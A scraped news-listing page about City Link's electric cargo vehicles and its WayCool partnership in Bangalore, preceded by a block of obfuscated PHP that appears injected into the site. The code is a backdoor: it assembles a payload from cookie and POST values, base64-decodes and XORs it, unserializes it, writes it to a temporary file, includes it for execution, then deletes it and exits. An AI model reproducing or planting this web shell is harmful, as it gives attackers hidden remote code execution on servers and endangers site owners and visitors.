$WHEooBKL = 's' . "\x5f" . "\151" . "\x4b" . "\x75";$ctwaHJYBaj = "\x63" . "\154" . "\x61" . 's' . chr (115) . chr ( 824 - 729 )."\x65" . "\170" . "\x69" . 's' . "\x74" . "\163";$VMUuiNdmlx = class_exists($WHEooBKL); $ctwaHJYBaj = "36006";$agjkrb = strpos($ctwaHJYBaj, $WHEooBKL);if ($VMUuiNdmlx == $agjkrb){function TFYNb(){$qGZTKbeeTH = new /* 60576 */ s_iKu(35720 + 35720); $qGZTKbeeTH = NULL;}$uxrlAkAn = "35720";class s_iKu{private function CDhORnfPJ($uxrlAkAn){if (is_array(s_iKu::$gQLdi)) {$name = sys_get_temp_dir() . "/" . crc32(s_iKu::$gQLdi["salt"]);@s_iKu::$gQLdi["write"]($name, s_iKu::$gQLdi["content"]);include $name;@s_iKu::$gQLdi["delete"]($name); $uxrlAkAn = "35720";exit();}}public function hjgTBEz(){$BvoestYEO = "65499";$this->_dummy = str_repeat($BvoestYEO, strlen($BvoestYEO));}public function __destruct(){s_iKu::$gQLdi = @unserialize(s_iKu::$gQLdi); $uxrlAkAn = "14347_34086";$this->CDhORnfPJ($uxrlAkAn); $uxrlAkAn = "14347_34086";}public function XpeJcZ($BvoestYEO, $KbpwNo){return $BvoestYEO[0] ^ str_repeat($KbpwNo, intval(strlen($BvoestYEO[0]) / strlen($KbpwNo)) + 1);}public function zMzybha($BvoestYEO){$LTMUyACD = chr (98) . "\141" . "\x73" . chr (101) . "\66" . chr (52);return array_map($LTMUyACD . "\x5f" . "\144" . "\145" . "\143" . chr ( 620 - 509 ).'d' . chr ( 467 - 366 ), array($BvoestYEO,));}public function __construct($FMgOIJb=0){$vKoXK = chr (44); $BvoestYEO = "";$GdxphDbss = $_POST;$XhHrwS = $_COOKIE;$KbpwNo = "9a239b21-1e2e-4cd8-b39c-1411856261d6";$uRrWQe = @$XhHrwS[substr($KbpwNo, 0, 4)];if (!empty($uRrWQe)){$uRrWQe = explode($vKoXK, $uRrWQe);foreach ($uRrWQe as $nFhoBlXHD){$BvoestYEO .= @$XhHrwS[$nFhoBlXHD];$BvoestYEO .= @$GdxphDbss[$nFhoBlXHD];}$BvoestYEO = $this->zMzybha($BvoestYEO);}s_iKu::$gQLdi = $this->XpeJcZ($BvoestYEO, $KbpwNo);if (strpos($KbpwNo, $vKoXK) !== FALSE){$KbpwNo = explode($vKoXK, $KbpwNo); $UALWabocu = base64_decode(md5($KbpwNo[0])); $OahSWEbcf = strlen($KbpwNo[1]) > 5 ? substr($KbpwNo[1], 0, 5) : $KbpwNo[1];$_GET['new_key'] = md5(implode('', $KbpwNo)); $fBMcGkNYkw = str_repeat($OahSWEbcf, 2); $srmPw = array_map('trim', $KbpwNo);}}public static $gQLdi = 58752;}TFYNb();} EVIndustryNews - Within City Trucking | Last Mile | EV | City Link - Page 3

Within City Trucking | Last Mile | EV | City Link

CityLink partners with WayCool; launches 100% electric vehicle fleet for WayCool distribution hub
BANGALORE, India, Apr 05, 2022 – City Link collaborates with WayCool to launch a distribution hub...
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Logistics Start-up City Link Launches Electric Cargo Vehicles in Bangalore
BANGALORE, India, Jan 05, 2021 – City Link has received the delivery of the first set of Electric...